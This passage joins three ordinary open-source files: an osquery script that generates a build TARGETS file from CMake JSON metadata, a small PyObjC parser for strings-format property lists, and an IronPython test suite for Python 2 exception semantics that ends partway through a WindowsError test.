    third-party, example and generated-gen sources are skipped. Paths are
    rewritten relative to the last "osquery/" component, and generated
    sources are trimmed to start at "generated/".
    """
    files_to_compile = []
    for element in json_data:
        filename = element["file"]
        # Skip anything that is not a shippable library source.
        if filename.endswith("tests.cpp") or \
                filename.endswith("benchmarks.cpp") or \
                "third-party" in filename or \
                "example" in filename or \
                "generated/gen" in filename or \
                "test_util" in filename:
            continue
        base = filename.rfind("osquery/")
        # Bug fix: previously a missing "osquery/" (rfind == -1) silently
        # chopped 7 characters off the path; now mirror the guarded
        # handling used for "generated/" below.
        if base >= 0:
            filename = filename[base + len("osquery/"):]
        base_generated = filename.rfind("generated/")
        if base_generated >= 0:
            filename = filename[base_generated:]
        files_to_compile.append(filename)
    return files_to_compile
TARGETS_PREAMBLE = """
# DO NOT EDIT
# Automatically generated: make sync
thrift_library(
name="if",
languages=[
"cpp",
"py",
],
py_base_module="osquery",
thrift_srcs={
"extensions.thrift": ["Extension", "ExtensionManager"],
},
)
cpp_library(
name="osquery_sdk",
headers=AutoHeaders.RECURSIVE_GLOB,
link_whole=True,
srcs=["""
TARGETS_POSTSCRIPT = """ ],
deps=[
"@/thrift/lib/cpp/concurrency:concurrency",
"@/rocksdb:rocksdb",
":if-cpp",
],
external_deps=[
"boost",
"glog",
"gflags",
"gtest",
("e2fsprogs", None, "uuid"),
],
compiler_flags=[
"-Wno-unused-function",
"-Wno-non-virtual-dtor",
"-Wno-address",
"-Wno-overloaded-virtual",
"-DOSQUERY_BUILD_PLATFORM=centos7",
"-DOSQUERY_BUILD_DISTRO=centos7",
"-DOSQUERY_PLATFORM_MASK=9",
"-DOSQUERY_THRIFT_LIB=thrift/lib/cpp",
"-DOSQUERY_THRIFT_SERVER_LIB=thrift/lib/cpp/server/example",
"-DOSQUERY_THRIFT_POINTER=std",
"-DOSQUERY_THRIFT=osquery/gen-cpp/",
],
propagated_pp_flags=[
"-DOSQUERY_BUILD_VERSION=%s",
"-DOSQUERY_BUILD_SDK_VERSION=%s",
"-DOSQUERY_BUILD_PLATFORM=centos",
"-DOSQUERY_BUILD_DISTRO=centos7",
"-DOSQUERY_PLATFORM_MASK=9",
]
)
"""
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description=(
        "Generate a TARGETS files from CMake metadata"
    ))
    parser.add_argument("--input", "-i", required=True)
    parser.add_argument("--version", "-v", required=True)
    parser.add_argument("--sdk", required=True)
    args = parser.parse_args()

    try:
        with open(args.input, "r") as f:
            try:
                json_data = json.loads(f.read())
            except ValueError:
                logging.critical("Error: %s is not valid JSON" % args.input)
                # Bug fix: execution previously fell through and crashed
                # with a NameError on json_data; abort explicitly instead.
                raise SystemExit(1)
        source_files = get_files_to_compile(json_data)
        print(TARGETS_PREAMBLE)
        for source_file in source_files:
            print(" \"%s\"," % source_file)
        print(TARGETS_POSTSCRIPT % (args.version, args.sdk))
    except IOError:
        logging.critical("Error: %s doesn't exist" % args.input)
| {
"content_hash": "467d4e0b46febc82256be4d6e4277e9c",
"timestamp": "",
"source": "github",
"line_count": 112,
"max_line_length": 76,
"avg_line_length": 28.607142857142858,
"alnum_prop": 0.599250936329588,
"repo_name": "tburgin/osquery",
"id": "0d36bf7507ceb5dc5510cc05e6f16245107c6e30",
"size": "3227",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "tools/codegen/gentargets.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "37970"
},
{
"name": "C++",
"bytes": "1429433"
},
{
"name": "CMake",
"bytes": "72803"
},
{
"name": "Makefile",
"bytes": "3468"
},
{
"name": "Objective-C++",
"bytes": "51002"
},
{
"name": "Shell",
"bytes": "2030"
},
{
"name": "Thrift",
"bytes": "2879"
}
],
"symlink_target": ""
} |
from Foundation import *
from PyObjCTools import Conversion
def myNewParser(result):
    """Parse a strings-file-format result into a Python collection.

    Converts `result` to an NSString, parses it as an old-style
    .strings property list, and bridges the resulting NSDictionary
    to a native Python collection.  (Python 2 / PyObjC.)
    """
    tempResult = NSString.alloc().initWithString_(unicode(result))
    print tempResult
    # NOTE(review): .nsstring() on an NSString looks redundant — confirm
    # whether this is needed for the PyObjC unicode proxy type.
    resultDict = tempResult.nsstring().propertyListFromStringsFileFormat()
    return Conversion.pythonCollectionFromPropertyList(resultDict)
| {
"content_hash": "60a85f74f7eec31a711f5754ae35dfcf",
"timestamp": "",
"source": "github",
"line_count": 9,
"max_line_length": 74,
"avg_line_length": 35.22222222222222,
"alnum_prop": 0.804416403785489,
"repo_name": "jweede/pyxg",
"id": "adb21d079ea907c6e76e83f8c29eaca4c605c2aa",
"size": "317",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "sandbox/sandbox.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
} |
from iptest.assert_util import *
from iptest.warning_util import warning_trapper
import sys
# Sanity check: no exception is pending at import time.
AreEqual(sys.exc_info(), (None, None, None))
def test_exception_line_no_with_finally():
    """Traceback line numbers must be correct when raising through finally.

    NOTE: `expected` holds absolute line numbers of the raise site and the
    f() call site in this file — editing lines above breaks this test.
    """
    def f():
        try:
            raise Exception()   # this line should correspond w/ the number below
        finally:
            pass
    try:
        f()
    except Exception, e:
        tb = sys.exc_info()[2]
        expected = [25, 30]
        while tb:
            AreEqual(tb.tb_lineno, expected.pop())  # adding lines will require an update here
            tb = tb.tb_next
if is_cli or is_silverlight:
    def test_system_exception():
        # A raised .NET System.SystemException surfaces in Python as SystemError.
        import System
        def RaiseSystemException():
            raise System.SystemException()
        AssertError(SystemError, RaiseSystemException)
        # NOTE(review): indentation was lost in this copy; this assert is
        # assumed to belong to the test body — confirm against upstream.
        # The handled exception must not leak into sys.exc_info().
        AreEqual(sys.exc_info(), (None, None, None))
if is_cli or is_silverlight:
    def test_raise():
        # str() of an AssertionError must equal its first constructor argument.
        try:
            Fail("Message")
        except AssertionError, e:
            AreEqual(e.__str__(), e.args[0])
        else:
            Fail("Expected exception")
def test_finally_continue_fails():
    # 'continue' directly inside a finally clause is a SyntaxError
    # (Python 2 / pre-3.8 semantics).
    t = '''
try:
    pass
finally:
    continue
'''
    try:
        compile(t, '<test>', 'exec')
        Fail("Should raise SyntaxError")
    except SyntaxError:
        pass
def test_finally_continue_in_loop_allowed():
    # 'continue' is legal when it targets a loop fully nested inside the
    # finally clause.
    t = '''
try:
    pass
finally:
    for i in range(1):
        continue
'''
    try:
        compile(t, '<test>', 'exec')
    except SyntaxError:
        Fail("Should not raise SyntaxError")
def test_finally_continue_nested_finally_fails():
    # Even inside a loop, a 'continue' that sits in a *nested* finally clause
    # is still illegal (pre-3.8 semantics).
    t = '''
try:
    pass
finally:
    for i in range(1):
        try:
            pass
        finally:
            continue
'''
    try:
        compile(t, '<test>', 'exec')
        Fail("Should raise SyntaxError")
    except SyntaxError:
        pass
def test_bigint_division():
    # Division, modulo and floor-division by every flavour of zero
    # (int, long, float, bigint, complex) must raise ZeroDivisionError.
    def divide(a, b):
        try:
            c = a / b
            Fail("Expected ZeroDivisionError for %r / %r == %r" % (a, b, c))
        except ZeroDivisionError:
            pass
        try:
            c = a % b
            Fail("Expected ZeroDivisionError for %r %% %r == %r" % (a, b, c))
        except ZeroDivisionError:
            pass
        try:
            c = a // b
            Fail("Expected ZeroDivisionError for %r // %r == %r" % (a, b, c))
        except ZeroDivisionError:
            pass
    big0 = 9999999999999999999999999999999999999999999999999999999999999999999999
    big0 = big0-big0  # a zero that went through bigint arithmetic
    pats = [0L, 0, 0.0, big0, (0+0j)]
    nums = [42, 987654321, 7698736985726395723649587263984756239847562983745692837465928374569283746592837465923, 2352345324523532523, 5223523.3453, (10+25j)]
    for divisor in pats:
        for number in nums:
            divide(number, divisor)
# sys.exit() test
def test_handlers():
    # sys.exit() propagates as SystemExit, running finally blocks
    # innermost-first on the way out.
    handlers = []
    def a():
        try:
            b()
        finally:
            handlers.append("finally a")
    def b():
        try:
            c()
        finally:
            handlers.append("finally b")
    def c():
        try:
            d()
        finally:
            handlers.append("finally c")
    def d():
        sys.exit("abnormal termination")
    try:
        a()
    except SystemExit, e:
        handlers.append(e.args[0])
    Assert(handlers == ["finally c", "finally b", "finally a", "abnormal termination"])
def test_sys_exit1():
    # sys.exit() with no argument produces a SystemExit with empty args.
    try:
        sys.exit()
        Assert(False)
    except SystemExit, e:
        AreEqual(len(e.args), 0)
def test_sys_exit2():
    # sys.exit(None) drops the None from args...
    try:
        sys.exit(None)
        Assert(False)
    except SystemExit, e:
        AreEqual(e.args, ())
    # ...but constructing SystemExit(None) directly keeps it.
    AreEqual(SystemExit(None).args, (None,))
def test_sys_exit3():
    # A non-None argument becomes both the exit code and args[0].
    try:
        sys.exit(-10)
    except SystemExit, e:
        AreEqual(e.code, -10)
        AreEqual(e.args, (-10,))
    else:
        Assert(False)
################################
# exception interop tests
if is_cli or is_silverlight:
    def test_interop():
        # Exception interop between Python and the CLR: exceptions raised in
        # Python must translate into .NET exceptions (and back) across virtual
        # calls, catch/rethrow, and overload-resolution slow paths.
        # NOTE(review): indentation was lost in this copy of the file; all
        # statements below are assumed to belong to test_interop — confirm
        # against the upstream IronPython sources.
        load_iron_python_test()
        from IronPythonTest import ExceptionsTest
        import System
        import sys
        a = ExceptionsTest()
        try:
            a.ThrowException()  # throws index out of range
        except IndexError, e:
            Assert(e.__class__ == IndexError)
        class MyTest(ExceptionsTest):
            def VirtualFunc(self):
                raise ex, "hello world"
        ex = ValueError
        a = MyTest()
        # raise in python, translate into .NET, catch in Python
        try:
            a.CallVirtual()
        except ex, e:
            Assert(e.__class__ == ValueError)
            Assert(e.args[0] == "hello world")
        # raise in python, catch in .NET, verify .NET got an ArgumentException
        try:
            x = a.CallVirtCatch()
        except ex, e:
            Assert(False)
        Assert(isinstance(x, System.ArgumentException))
        # call through the slow paths...
        try:
            a.CallVirtualOverloaded('abc')
        except ex,e:
            Assert(e.__class__ == ex)
            Assert(e.args[0] == "hello world")
        # Note that sys.exc_info() is still set
        try:
            a.CallVirtualOverloaded(5)
        except ex,e:
            Assert(e.__class__ == ex)
            Assert(e.args[0] == "hello world")
        try:
            a.CallVirtualOverloaded(a)
        except ex,e:
            Assert(e.__class__ == ex)
            Assert(e.args[0] == "hello world")
        # catch and re-throw (both throw again and rethrow)
        try:
            a.CatchAndRethrow()
        except ex,e:
            Assert(e.__class__ == ex)
            Assert(e.args[0] == "hello world")
        try:
            a.CatchAndRethrow2()
        except ex,e:
            Assert(e.__class__ == ex)
            Assert(e.args[0] == "hello world")
        class MyTest(ExceptionsTest):
            def VirtualFunc(self):
                self.ThrowException()
        a = MyTest()
        # start in python, call CLS which calls Python which calls CLS which raises the exception
        try:
            a.CallVirtual()  # throws index out of range
        except IndexError, e:
            Assert(e.__class__ == IndexError)
        # verify we can throw arbitrary classes
        class MyClass: pass
        try:
            raise MyClass
            Assert(False)
        except MyClass, mc:
            Assert(mc.__class__ == MyClass)
        # BUG 430 intern(None) should throw TypeError
        try:
            intern(None)
            Assert(False)
        except TypeError:
            pass
        # /BUG
        # BUG 393 exceptions throw when bad value passed to except
        try:
            try:
                raise SyntaxError("foo")
            except 12:
                Assert(False)
            pass
        except SyntaxError:
            pass
        # /BUG
        # BUG 319 IOError not raised.
        if is_silverlight==False:
            try:
                fp = file('thisfiledoesnotexistatall.txt')
            except IOError:
                pass
        # /BUG
        # verify we can raise & catch CLR exceptions
        try:
            raise System.Exception('Hello World')
        except System.Exception, e:
            Assert(type(e) == System.Exception)
        # BUG 481 Trying to pass raise in Traceback should cause an error until it is implemented
        try:
            raise StopIteration("BadTraceback"), "somedata", "a string is not a traceback"
            Assert (False, "fell through raise for some reason")
        except StopIteration:
            Assert(False)
        except TypeError:
            pass
        try:
            raise TypeError
        except:
            import sys
            if (sys.exc_traceback != None):
                x = dir(sys.exc_traceback)
                for name in ['tb_frame', 'tb_lasti', 'tb_lineno', 'tb_next']:
                    Assert(name in x, name)
                try:
                    raise Exception("foo"), "Msg", sys.exc_traceback
                except Exception, X:
                    pass
        # Exception args are indexable in Python 2.
        try:
            raise Exception(3,4,5)
        except Exception, X:
            AreEqual(X[0], 3)
            AreEqual(X[1], 4)
            AreEqual(X[2], 5)
        try:
            raise Exception
        except:
            import exceptions
            AreEqual(sys.exc_info()[0], exceptions.Exception)
            AreEqual(sys.exc_info()[1].__class__, exceptions.Exception)
        try:
            Fail("message")
        except AssertionError, e:
            import exceptions
            AreEqual(e.__class__, exceptions.AssertionError)
            AreEqual(len(e.args), 1)
            AreEqual(e.args[0], "message")
        else:
            Fail("Expected exception")
#####################################################################################
# __str__ behaves differently for exceptions because of implementation (ExceptionConverter.ExceptionToString)
# TODO: doesn't work in IronPython
#def test_str1():
# AssertErrorWithMessage(TypeError, "descriptor '__str__' of 'exceptions.BaseException' object needs an argument", Exception.__str__)
# AssertErrorWithMessage(TypeError, "descriptor '__str__' requires a 'exceptions.BaseException' object but received a 'list'", Exception.__str__, list())
# AssertErrorWithMessage(TypeError, "descriptor '__str__' requires a 'exceptions.BaseException' object but received a 'list'", Exception.__str__, list(), 1)
# AssertErrorWithMessage(TypeError, "expected 0 arguments, got 1", Exception.__str__, Exception(), 1)
def test_str2():
    # verify we can assign to sys.exc_* (legacy Python 2 globals)
    sys.exc_traceback = None
    sys.exc_value = None
    sys.exc_type = None
    # An argument-less exception stringifies to the empty string.
    AreEqual(str(Exception()), '')
#####################################################################
if is_cli or is_silverlight:
    def test_array():
        # System.Array is abstract and cannot be instantiated directly.
        import System
        try:
            a = System.Array()
        except Exception, e:
            AreEqual(e.__class__, TypeError)
        else:
            Assert(False, "FAILED!")
def test_assert_error():
    # AssertError itself: wrong-range chr() raises ValueError; calling the
    # non-callable None raises TypeError.
    AssertError(ValueError, chr, -1)
    AssertError(TypeError, None)
def test_dir():
    # dir() reflects local bindings, including after 'del'.
    testingdir = 10
    Assert('testingdir' in dir())
    del testingdir
    Assert(not 'testingdir' in dir())
def test_assert():
    # A failed Assert must raise AssertionError carrying the given message.
    try:
        Assert(False, "Failed message")
    except AssertionError, e:
        Assert(e.args[0] == "Failed message")
    else:
        Fail("should have thrown")
    try:
        Assert(False, "Failed message 2")
    except AssertionError, e:
        Assert(e.args[0] == "Failed message 2")
    else:
        Fail("should have thrown")
def test_syntax_error_exception():
    # SyntaxError instances expose lineno/offset/filename/text (and, on the
    # CLR, a clsException with Line/Column accessors).
    try:
        compile('a = """\n\n', 'foo', 'single', 0x200)
    except SyntaxError, se:
        AreEqual(se.offset, 9)
    try:
        compile('a = """\n\nxxxx\nxxx\n', 'foo', 'single', 0x200)
    except SyntaxError, se:
        AreEqual(se.offset, 18)
    try:
        compile('abc\na = """\n\n', 'foo', 'exec', 0x200)
    except SyntaxError, se:
        AreEqual(se.offset, 9)
    try:
        compile("if 2==2: x=2\nelse:y=", "Error", "exec")
    except SyntaxError, se:
        l1 = dir(se)
        Assert('lineno' in l1)
        Assert('offset' in l1)
        Assert('filename' in l1)
        Assert('text' in l1)
        if is_cli or is_silverlight:
            import clr
            l2 = dir(se.clsException)
            Assert('Line' in l2)
            Assert('Column' in l2)
            Assert('GetSymbolDocumentName' in l2)
            Assert('GetCodeLine' in l2)
        AreEqual(se.lineno, 2)
        # Bug 1132
        #AreEqual(se.offset, 7)
        AreEqual(se.filename, "Error")
        if is_ironpython: #http://ironpython.codeplex.com/workitem/27989
            AreEqual(se.text, "else:y=")
        else:
            AreEqual(se.text, "else:y=\n")
        if is_cli or is_silverlight:
            AreEqual(se.clsException.Line, 2)
            # Bug 1132
            #AreEqual(se.clsException.Column, 7)
            AreEqual(se.clsException.GetSymbolDocumentName(), "Error")
            AreEqual(se.clsException.GetCodeLine(), "else:y=")
        AreEqual(se.__dict__, {})
        AreEqual(type(se.__dict__), dict)
def test_syntax_error_exception_exec():
    # Same attribute checks as above, but for 'exec' mode compilation.
    try:
        compile("if 2==2: x=", "Error", "exec")
    except SyntaxError, se:
        AreEqual(se.lineno, 1)
        # Bug 1132
        #AreEqual(se.offset, 11)
        AreEqual(se.filename, "Error")
        if is_ironpython: #http://ironpython.codeplex.com/workitem/27989
            AreEqual(se.text, "if 2==2: x=")
        else:
            AreEqual(se.text, "if 2==2: x=\n")
        AreEqual(se.__dict__, {})
        AreEqual(type(se.__dict__), dict)
def test_syntax_error_exception_eval():
    # Same attribute checks, 'eval' mode: no trailing newline is appended.
    try:
        compile("if 2==2: x=", "Error", "eval")
    except SyntaxError, se:
        AreEqual(se.lineno, 1)
        # Bug 1132
        #AreEqual(se.offset, 2)
        AreEqual(se.filename, "Error")
        AreEqual(se.text, "if 2==2: x=")
        AreEqual(se.__dict__, {})
        AreEqual(type(se.__dict__), dict)
def test_user_syntax_error_exception():
    # Directly-constructed SyntaxError: attribute defaults, the two-argument
    # (msg, (filename, lineno, offset, text)) form, and arity errors.
    x = SyntaxError()
    AreEqual(x.lineno, None)
    AreEqual(x.filename, None)
    AreEqual(x.msg, None)
    AreEqual(x.message, '')
    AreEqual(x.offset, None)
    AreEqual(x.print_file_and_line, None)
    AreEqual(x.text, None)
    #Run a few minimal tests to ensure the __dict__ member works OK
    AreEqual(x.__dict__, {})
    AreEqual(type(x.__dict__), dict)
    x.arbitrary = 3.14
    AreEqual(x.__dict__["arbitrary"], 3.14)
    del x.__dict__["arbitrary"]
    AreEqual(x.__dict__, {})
    x = SyntaxError('hello')
    AreEqual(x.lineno, None)
    AreEqual(x.filename, None)
    AreEqual(x.msg, 'hello')
    AreEqual(x.message, 'hello')
    AreEqual(x.offset, None)
    AreEqual(x.print_file_and_line, None)
    AreEqual(x.text, None)
    x = SyntaxError('hello', (1,2,3,4))
    AreEqual(x.lineno, 2)
    AreEqual(x.filename, 1)
    AreEqual(x.msg, 'hello')
    AreEqual(x.message, '')
    AreEqual(x.offset, 3)
    AreEqual(x.print_file_and_line, None)
    AreEqual(x.text, 4)
    # The detail tuple must have exactly four elements.
    AssertError(IndexError, SyntaxError, 'abc', ())
    AssertError(IndexError, SyntaxError, 'abc', (1,))
    AssertError(IndexError, SyntaxError, 'abc', (1,2))
    AssertError(IndexError, SyntaxError, 'abc', (1,2,3))
def test_return():
    # 'return' inside an except handler that is nested within finally blocks
    # must win over the unwinding, at every nesting depth.
    # NOTE(review): indentation was lost in this copy; the nesting below is
    # reconstructed — confirm against upstream.
    def test_func():
        try: pass
        finally:
            try: raise 'foo'
            except:
                return 42
    AreEqual(test_func(), 42)
    def test_func():
        try: pass
        finally:
            try: raise 'foo'
            except:
                try: raise 'foo'
                except:
                    return 42
    AreEqual(test_func(), 42)
    def test_func():
        try: pass
        finally:
            try: pass
            finally:
                try: raise 'foo'
                except:
                    try: raise 'foo'
                    except:
                        return 42
    AreEqual(test_func(), 42)
    def test_func():
        try: raise 'foo'
        except:
            try: pass
            finally:
                try: raise 'foo'
                except:
                    try: raise 'foo'
                    except:
                        return 42
    AreEqual(test_func(), 42)
def test_break_and_continue():
    # break/continue must behave normally inside except and finally blocks,
    # including when a pending exception is being unwound.
    class stateobj(object):
        __slots__ = ['loops', 'finallyCalled']
        def __init__(self):
            self.loops = 0
            self.finallyCalled = False
    def test_break(state):
        try:
            try:
                raise Exception()
            except:
                for n in range(10):
                    state.loops += 1
                    break
                return 42
        except: pass
    def test_continue(state):
        try:
            try:
                raise Exception()
            except:
                for n in range(10):
                    state.loops += 1
                    continue
                return 42
        except: pass
    def test_multi_break(state):
        try:
            try:
                raise Exception()
            except:
                for n in range(10):
                    state.loops += 1
                    if False: break
                    break
                return 42
        except: pass
    def test_multi_continue(state):
        try:
            try:
                raise Exception()
            except:
                for n in range(10):
                    state.loops += 1
                    if False: continue
                    continue
                return 42
        except: pass
    state = stateobj()
    AreEqual(test_break(state), 42)
    AreEqual(state.loops, 1)
    state = stateobj()
    AreEqual(test_continue(state), 42)
    AreEqual(state.loops, 10)
    state = stateobj()
    AreEqual(test_multi_break(state), 42)
    AreEqual(state.loops, 1)
    state = stateobj()
    AreEqual(test_multi_continue(state), 42)
    AreEqual(state.loops, 10)
    # A break inside finally discards the in-flight exception.
    def test_break_in_finally_raise(state):
        for x in range(10):
            try:
                raise 'foo'
            finally:
                state.finallyCalled = True
                break
        return 42
    def test_break_in_finally(state):
        for x in range(10):
            try: pass
            finally:
                state.finallyCalled = True
                break
        return 42
    state = stateobj()
    AreEqual(test_break_in_finally_raise(state), 42)
    AreEqual(state.finallyCalled, True)
    state = stateobj()
    AreEqual(test_break_in_finally(state), 42)
    AreEqual(state.finallyCalled, True)
    def test_outer_for_with_finally(state, shouldRaise):
        for x in range(10):
            try:
                try:
                    if shouldRaise:
                        raise 'hello world'
                finally:
                    state.finallyCalled = True
                    break
            except:
                pass
            raise 'bad!!!'
        return 42
    state = stateobj()
    AreEqual(test_outer_for_with_finally(state, False), 42)
    AreEqual(state.finallyCalled, True)
    state = stateobj()
    AreEqual(test_outer_for_with_finally(state, True), 42)
    AreEqual(state.finallyCalled, True)
    # NOTE(review): the definition and checks below are an exact duplicate of
    # the block above (the duplication exists in the original source too).
    def test_outer_for_with_finally(state, shouldRaise):
        for x in range(10):
            try:
                try:
                    if shouldRaise:
                        raise 'hello world'
                finally:
                    state.finallyCalled = True
                    break
            except:
                pass
            raise 'bad!!!'
        return 42
    state = stateobj()
    AreEqual(test_outer_for_with_finally(state, False), 42)
    AreEqual(state.finallyCalled, True)
    state = stateobj()
    AreEqual(test_outer_for_with_finally(state, True), 42)
    AreEqual(state.finallyCalled, True)
def test_serializable_clionly():
    # Exceptions raised in another AppDomain must serialize back across the
    # remoting boundary as the same Python exception type.
    import clr
    import System
    from IronPythonTest import ExceptionsTest
    path = clr.GetClrType(ExceptionsTest).Assembly.Location
    mbro = System.AppDomain.CurrentDomain.CreateInstanceFromAndUnwrap(path, "IronPythonTest.EngineTest")
    AssertError(AssertionError, mbro.Run, 'raise AssertionError')
    import exceptions
    for eh in dir(exceptions):
        eh = getattr(exceptions, eh)
        if isinstance(eh, type) and issubclass(eh, BaseException):
            # unicode exceptions require more args...
            if (eh.__name__ != 'UnicodeDecodeError' and
                eh.__name__ != 'UnicodeEncodeError' and
                eh.__name__ != 'UnicodeTranslateError'):
                AssertError(eh, mbro.Run, 'raise ' + eh.__name__)
def test_sanity():
    '''
    Sanity checks to ensure all exceptions implemented can be created/thrown/etc
    in the standard ways.
    '''
    #build up a list of all valid exceptions
    import exceptions
    #special cases - do not test these like everything else
    special_types = [ "UnicodeTranslateError", "UnicodeEncodeError", "UnicodeDecodeError"]
    exception_types = [ x for x in exceptions.__dict__.keys() if x.startswith("__")==False and special_types.count(x)==0]
    exception_types = [ eval("exceptions." + x) for x in exception_types]
    #run a few sanity checks
    for exception_type in exception_types:
        except_list = [exception_type(), exception_type("a single param")]
        for t_except in except_list:
            try:
                raise t_except
            except exception_type, e:
                pass
            str_except = str(t_except)
            #there is no __getstate__ method of exceptions...
            Assert(not hasattr(t_except, '__getstate__'))
    # NOTE(review): indentation was lost in this copy; the special-case unicode
    # checks are assumed to sit under the silverlight guard — confirm upstream.
    if not is_silverlight:
        #special cases
        encode_except = exceptions.UnicodeEncodeError("1", u"2", 3, 4, "5")
        AreEqual(encode_except.encoding, "1")
        AreEqual(encode_except.object, u"2")
        AreEqual(encode_except.start, 3)
        AreEqual(encode_except.end, 4)
        AreEqual(encode_except.reason, "5")
        AreEqual(encode_except.message, "")
        #CodePlex Work Item 356
        #AssertError(TypeError, exceptions.UnicodeDecodeError, "1", u"2", 3, 4, "e")
        exceptions.UnicodeDecodeError("1", "2", 3, 4, "e")
        decode_except = exceptions.UnicodeDecodeError("1", "2", 3, 4, "5")
        AreEqual(decode_except.encoding, "1")
        AreEqual(decode_except.object, "2")
        AreEqual(decode_except.start, 3)
        AreEqual(decode_except.end, 4)
        AreEqual(decode_except.reason, "5")
        AreEqual(decode_except.message, "")
        translate_except = exceptions.UnicodeTranslateError(u"1", 2, 3, "4")
        AreEqual(translate_except.object, u"1")
        AreEqual(translate_except.start, 2)
        AreEqual(translate_except.end, 3)
        AreEqual(translate_except.reason, "4")
        AreEqual(translate_except.message, "")
        AreEqual(translate_except.encoding, None)
def test_nested_exceptions():
    # sys.exc_info() must be pushed/popped correctly across nested handlers.
    try:
        raise Exception()
    except Exception, e:
        # PushException
        try:
            raise TypeError
        except TypeError, te:
            # PushException
            ei = sys.exc_info()
        # PopException
        ei2 = sys.exc_info()
        AreEqual(ei, ei2)
    ei3 = sys.exc_info()
    AreEqual(ei, ei3)
def test_swallow_from_else():
    # A 'return' in finally swallows an exception raised from the else clause.
    def f():
        try:
            pass
        except:
            pass
        else:
            raise AttributeError
        finally:
            return 4
    AreEqual(f(), 4)
def test_newstyle_raise():
    # raise a new style exception via raise type, value that returns an arbitrary object
    class MyException(Exception):
        def __new__(cls, *args): return 42
    try:
        raise MyException, 'abc'
        AssertUnreachable()
    except Exception, e:
        # The caught "exception" is whatever __new__ returned.
        AreEqual(e, 42)
def test_enverror_init():
    # EnvironmentError.__init__ re-initialization rules: errno/strerror are
    # set for 2-3 args, filename only for exactly 3, and args excludes the
    # filename; re-running __init__ never resets previously-set attributes.
    x = EnvironmentError()
    AreEqual(x.message, '')
    AreEqual(x.errno, None)
    AreEqual(x.filename, None)
    AreEqual(x.strerror, None)
    AreEqual(x.args, ())
    x.__init__('abc')
    AreEqual(x.message, 'abc')
    AreEqual(x.args, ('abc', ))
    x.__init__('123', '456')
    AreEqual(x.message, 'abc')
    AreEqual(x.errno, '123')
    AreEqual(x.strerror, '456')
    AreEqual(x.args, ('123', '456'))
    x.__init__('def', 'qrt', 'foo')
    AreEqual(x.message, 'abc')
    AreEqual(x.errno, 'def')
    AreEqual(x.strerror, 'qrt')
    AreEqual(x.filename, 'foo')
    AreEqual(x.args, ('def', 'qrt')) # filename not included in args
    x.__init__()
    AreEqual(x.message, 'abc')
    AreEqual(x.errno, 'def')
    AreEqual(x.strerror, 'qrt')
    AreEqual(x.filename, 'foo')
    AreEqual(x.args, ())
    x.__init__('1', '2', '3', '4')
    AreEqual(x.message, 'abc')
    AreEqual(x.errno, 'def')
    AreEqual(x.strerror, 'qrt')
    AreEqual(x.filename, 'foo')
    AreEqual(x.args, ('1', '2', '3', '4'))
    x = EnvironmentError('a', 'b', 'c', 'd')
    AreEqual(x.message, '')
    AreEqual(x.errno, None)
    AreEqual(x.filename, None)
    AreEqual(x.strerror, None)
    AreEqual(x.args, ('a', 'b', 'c', 'd'))
def test_raise_None():
    # Each 'raise None' must produce a fresh exception object, so the two
    # tracebacks must point at different lines.
    lineno1, lineno2 = 0, 0
    try:
        raise None
    except:
        lineno1 = sys.exc_info()[2].tb_lineno
    try:
        # dummy line
        raise None
    except:
        lineno2 = sys.exc_info()[2].tb_lineno
    Assert(lineno1 != lineno2, "FAILED! Should not have reused exception")
def test_exception_setstate():
    # __setstate__ merges the given mapping into the exception's __dict__,
    # overwriting existing keys and keeping the rest.
    exc = BaseException()
    AreEqual(exc.__dict__, {})
    exc.__setstate__({'a': 1, 'b': 2})
    AreEqual(exc.__dict__, {'a': 1, 'b': 2})
    exc.__setstate__({'a': 3, 'c': 4})
    AreEqual(exc.__dict__, {'a': 3, 'b': 2, 'c': 4})
def test_deprecated_string_exception():
    # Raising a string (a Python 2 legacy feature) must emit a deprecation
    # warning, and on modern runtimes actually raises TypeError.
    w = warning_trapper()
    try:
        raise 'Error'
    except:
        pass
    m = w.finish()
    try:
        raise 'foo'
    except TypeError, e:
        print e.message
def test_nested_try():
    # The else clause runs when no exception occurred, for both nested and
    # flat try statements.
    global l
    l = []
    def foo():
        try:
            try:
                l.append(1)
            except:
                pass
        except:
            l.append(2)
        else:
            l.append(3)
    foo()
    AreEqual(l, [1, 3])
    l = []
    def bar():
        try:
            l.append(1)
        except:
            l.append(2)
        else:
            l.append(3)
    bar()
    AreEqual(l, [1, 3])
def test_module_exceptions():
    """verify exceptions in modules are like user defined exception objects, not built-in types."""
    # these modules have normal types...
    normal_types = ['sys', 'clr', 'exceptions', '__builtin__', '_winreg', 'mmap', 'nt']
    builtins = [x for x in sys.builtin_module_names if x not in normal_types ]
    for module in builtins:
        mod = __import__(module)
        for attrName in dir(mod):
            val = getattr(mod, attrName)
            if isinstance(val, type) and issubclass(val, Exception):
                # NOTE(review): indentation was lost in this copy; the branch
                # structure below is reconstructed — confirm upstream.
                if "BlockingIOError" not in repr(val):
                    Assert(repr(val).startswith("<class "))
                    # user-defined-style exceptions accept new class attributes
                    val.x = 2
                    AreEqual(val.x, 2)
                elif is_cpython:
                    Assert(repr(val).startswith("<type "))
                else: #http://ironpython.codeplex.com/workitem/28383
                    Assert(repr(val).startswith("<class "))
def test_raise_inside_str():
    #raising an error inside the __str__ used to cause an unhandled exception.
    class error(Exception):
        def __str__(self):
            raise TypeError, "inside __str__"
    def f():
        raise error
    AssertError(error, f)
def test_exception_doc():
    # should be accessible, CPython and IronPython have different strings though.
    Exception().__doc__
    Exception("abc").__doc__
def test_repr_not_called():
    """__repr__ shouldn't be called when message is a tuple w/ multiple args"""
    class x(object):
        def __repr__(self):
            # Would propagate StopIteration if repr were (wrongly) invoked.
            raise StopIteration('repr should not be called')
    try:
        sys.exit((x(), x()))
    except SystemExit:
        pass
def test_windows_error():
    # int is required for 2/3 params
    AssertError(TypeError, WindowsError, 'foo', 'bar')
    AssertError(TypeError, WindowsError, 'foo', 'bar', 'baz')
    # With 4+ args nothing is parsed into errno/winerror/filename/strerror.
    err = WindowsError('foo', 'bar', 'baz', 'quox')
    AreEqual(err.errno, None)
    AreEqual(err.winerror, None)
    AreEqual(err.filename, None)
    AreEqual(err.strerror, None)
    AreEqual(err.args, ('foo', 'bar', 'baz', 'quox'))
    # 3-arg form: (winerror, strerror, filename); filename excluded from args.
